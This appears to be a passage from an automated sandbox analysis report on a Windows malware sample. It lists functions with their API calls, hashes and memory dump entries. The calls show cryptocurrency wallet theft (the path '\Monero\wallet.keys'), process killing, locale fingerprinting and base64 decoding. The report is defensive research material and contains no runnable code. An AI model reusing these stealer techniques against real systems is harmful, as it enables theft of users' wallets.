                              • Opcode ID: 78a3b4fb98dd3d63c4deff92ab50afaa8324be3aa8c25e74441b5371dfeb80e5
                              • Instruction ID: 917f536eff985e0f61cdbbfb5bfa473e12487713e6c392d43ec2308e3032331f
                              • Opcode Fuzzy Hash: 78a3b4fb98dd3d63c4deff92ab50afaa8324be3aa8c25e74441b5371dfeb80e5
                              • Instruction Fuzzy Hash: A4F11C719201189ACB29EB61CCB5EEE7379BF14304F4041DFA14A62291EF387B99CF59
                              Function 004CDB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004E15A8,004E0BAF), ref: 004CDBEB
                              • StrCmpCA.SHLWAPI(?,004E15AC), ref: 004CDC33
                              • StrCmpCA.SHLWAPI(?,004E15B0), ref: 004CDC49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CDECC
                              • FindClose.KERNEL32(000000FF), ref: 004CDEDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 7f1de8939294286fd7a5b9a492103d3a7ad057280ce87f3e9ef8acb6a5c8d8e2
                              • Instruction ID: 25f0a568271816746e1f91e536f26eb65404825618b0433007b48b5d3122ac11
                              • Opcode Fuzzy Hash: 7f1de8939294286fd7a5b9a492103d3a7ad057280ce87f3e9ef8acb6a5c8d8e2
                              • Instruction Fuzzy Hash: EF918776A0010497CB14FB71DD66EED737DAF84304F00866FF90656285EE38AB19CB9A
                              Function 004D98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004D9905
                              • Process32First.KERNEL32(004C9FDE,00000128), ref: 004D9919
                              • Process32Next.KERNEL32(004C9FDE,00000128), ref: 004D992E
                              • StrCmpCA.SHLWAPI(?,004C9FDE), ref: 004D9943
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004D995C
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004D997A
                              • CloseHandle.KERNEL32(00000000), ref: 004D9987
                              • CloseHandle.KERNEL32(004C9FDE), ref: 004D9993
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 2696918072-0
                              • Opcode ID: 35c1416e1cef826dd7993a1b0f7c4067812211021f6ab99f50777453a76050a4
                              • Instruction ID: 4363285fb206f566a6d6dd7643f8d2690bafda7cdad6a9d451781ffcfd234fd4
                              • Opcode Fuzzy Hash: 35c1416e1cef826dd7993a1b0f7c4067812211021f6ab99f50777453a76050a4
                              • Instruction Fuzzy Hash: DA111FB5A14208ABCB28DFA4DC58BDEB778BB48700F0085CEF505A6350D7789E85CF94
                              Function 00911563 Relevance: 11.6, Strings: 8, Instructions: 1600COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ({[$9[w$hC?$sj}\$)v$G`$G`$h(
                              • API String ID: 0-4088498789
                              • Opcode ID: 0760165e633035807160421b2cfae846b9a1652f34f9655055752c2e4d7689be
                              • Instruction ID: 1513373e027bdf825f2b2ada0f1b76916defaba9dee0ba159ef155ee130bf277
                              • Opcode Fuzzy Hash: 0760165e633035807160421b2cfae846b9a1652f34f9655055752c2e4d7689be
                              • Instruction Fuzzy Hash: D1B2E5F360C2049FE304AF29EC8567ABBE9EF94720F16893DE6C487344EA3558418797
                              Function 004D7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • GetKeyboardLayoutList.USER32(00000000,00000000,004E05B7), ref: 004D7D71
                              • LocalAlloc.KERNEL32(00000040,?), ref: 004D7D89
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 004D7D9D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 004D7DF2
                              • LocalFree.KERNEL32(00000000), ref: 004D7EB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: c1278b1b3e9aee2763a23cad55c0120a13e151f5b94779621b5c36321583dce6
                              • Instruction ID: 20073e825b4702ecf4d259ac35f2869a9dc205c4fca2f0ca0c9f6adef9e80ac2
                              • Opcode Fuzzy Hash: c1278b1b3e9aee2763a23cad55c0120a13e151f5b94779621b5c36321583dce6
                              • Instruction Fuzzy Hash: F0415F71950218ABCB24DB94DCA9BEEB774FF44704F2041DBE10962290DB782F85CF69
                              Function 00914B3B Relevance: 10.4, Strings: 7, Instructions: 1656COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #&y{$<6o>$? k$SrG?$\]k$j/oO$pCg.
                              • API String ID: 0-1613382923
                              • Opcode ID: 20a47a26ede6d5814d2d775fa0afc4444f8dbc109e6f59efb886091e84703047
                              • Instruction ID: a86603ec0ff8df57029f60a55b4d39c0af4da23c272e8e3f91d7662380a87a2a
                              • Opcode Fuzzy Hash: 20a47a26ede6d5814d2d775fa0afc4444f8dbc109e6f59efb886091e84703047
                              • Instruction Fuzzy Hash: EAB248F3A0C2049FE7086E2DEC8567ABBE9EF94320F16463DE6C5C3344EA7558058697
                              Function 0090DF01 Relevance: 10.4, Strings: 7, Instructions: 1613COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: &"&9$*f?6$5z<~$L,n{$Q={$]{>$ik
                              • API String ID: 0-2664790054
                              • Opcode ID: c482a8577b0e366cfe4e4dcc81fd252b285b7a1c65b3a8a473148bd58d433bac
                              • Instruction ID: 9214120592e2cee7308da776c7bb3fea6dc1e3cec131b039b95082217af3cae8
                              • Opcode Fuzzy Hash: c482a8577b0e366cfe4e4dcc81fd252b285b7a1c65b3a8a473148bd58d433bac
                              • Instruction Fuzzy Hash: 37B20AF3A0C210AFE3046E2DDC4567ABBE9EF94720F1A893DE6C4C7744E63558058796
                              Function 00918188 Relevance: 10.3, Strings: 7, Instructions: 1599COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #KC?$'8;u$9Wi$Dce=$GKW$n&{$G
                              • API String ID: 0-34963066
                              • Opcode ID: 47ebd70e525c65c70563ca61fa247064b041422d7884fbfb24c459728eccd2c5
                              • Instruction ID: 4fbdb47fab45c6baa3d709fad9fb8d4cc67d6ab6164f982793ac7afaf34101a9
                              • Opcode Fuzzy Hash: 47ebd70e525c65c70563ca61fa247064b041422d7884fbfb24c459728eccd2c5
                              • Instruction Fuzzy Hash: 08B237F360C2049FE3086E2DEC8567ABBE9EF94320F16493DEAC5C7744EA3558418697
                              Function 004CE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004DAC30: lstrcpy.KERNEL32(00000000,?), ref: 004DAC82
                                • Part of subcall function 004DAC30: lstrcat.KERNEL32(00000000), ref: 004DAC92
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,004E0D79), ref: 004CE5A2
                              • StrCmpCA.SHLWAPI(?,004E15F0), ref: 004CE5F2
                              • StrCmpCA.SHLWAPI(?,004E15F4), ref: 004CE608
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004CECDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: 4d3cc007497ba389dcbb6518ffa261ca1406430c8350ae0defb8b87c38c0b7d7
                              • Instruction ID: eb7de5508b472a42271eb5ba524c2a2fd3f91ca161f0fc96dc74347f2a86abff
                              • Opcode Fuzzy Hash: 4d3cc007497ba389dcbb6518ffa261ca1406430c8350ae0defb8b87c38c0b7d7
                              • Instruction Fuzzy Hash: B0126F32A101189BCB18FB61CCB6EED7379AF54304F4045AFB10A52295EF386F59CB5A
                              Function 004CA210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA23F
                              • LocalAlloc.KERNEL32(00000040,?,?,?,004C4F3E,00000000,?), ref: 004CA251
                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>OL,00000000,00000000), ref: 004CA27A
                              • LocalFree.KERNEL32(?,?,?,?,004C4F3E,00000000,?), ref: 004CA28F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptLocalString$AllocFree
                              • String ID: >OL
                              • API String ID: 4291131564-3644805113
                              • Opcode ID: e9957060b8e4f085bae9261ab59f35c5ddc1b590d8a025d3937b5cbe098cb9ee
                              • Instruction ID: e072bd68558e484c5075f299f9ba6bb76449c25f201f3bd30f2623acebdf8f0d
                              • Opcode Fuzzy Hash: e9957060b8e4f085bae9261ab59f35c5ddc1b590d8a025d3937b5cbe098cb9ee
                              • Instruction Fuzzy Hash: 8711D274240308AFEB14CFA4DC95FAA77B5FB88B04F208089FD199B390C7B6A941CB54
                              Function 0090C316 Relevance: 7.9, Strings: 5, Instructions: 1674COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                              • Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $q1H$*R}o$SDis$V"9$_m~~
                              • API String ID: 0-2716215135
                              • Opcode ID: 3b38c560db51f99dd1abe15451d01eb4f2d894ef48929371161b355373a33433
